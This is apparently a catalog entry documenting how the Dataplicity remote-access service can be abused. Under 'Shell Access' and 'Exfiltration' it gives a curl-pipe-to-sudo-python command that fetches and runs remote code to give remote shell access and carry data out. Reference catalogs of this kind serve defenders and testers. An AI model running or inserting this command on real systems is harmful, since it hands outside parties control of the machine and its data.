.. /Dataplicity
Star

Shell Access
Exfiltration

Dataplicity is free/subscription based tool which enables connecting local systems to dataplicity cloud for remotely accessing them over the internet.

Paths:

Resources:

Acknowledgements:

Detections:

Shell Access

  1. Having an account created on the website, it is possible to connect any system to the Dataplicity cloud and access it remotely, keeping shell-access.

    curl -s https://www.dataplicity.com/<TOKEN>.py | sudo python
    Use case
    Connecting the user machine to dataplicity cloud for shell-access/remote-access.
    Privileges required
    User
    Operating systems
    Windows, Mac, Linux

Exfiltration

  1. Having an account created on the website, it is possible to connect any system to the Dataplicity cloud and access it remotely, for data exfiltration.

    curl -s https://www.dataplicity.com/<TOKEN>.py | sudo python
    Use case
    Connecting the user machine to dataplicity cloud for data exfiltration.
    Privileges required
    User
    Operating systems
    Windows, Mac, Linux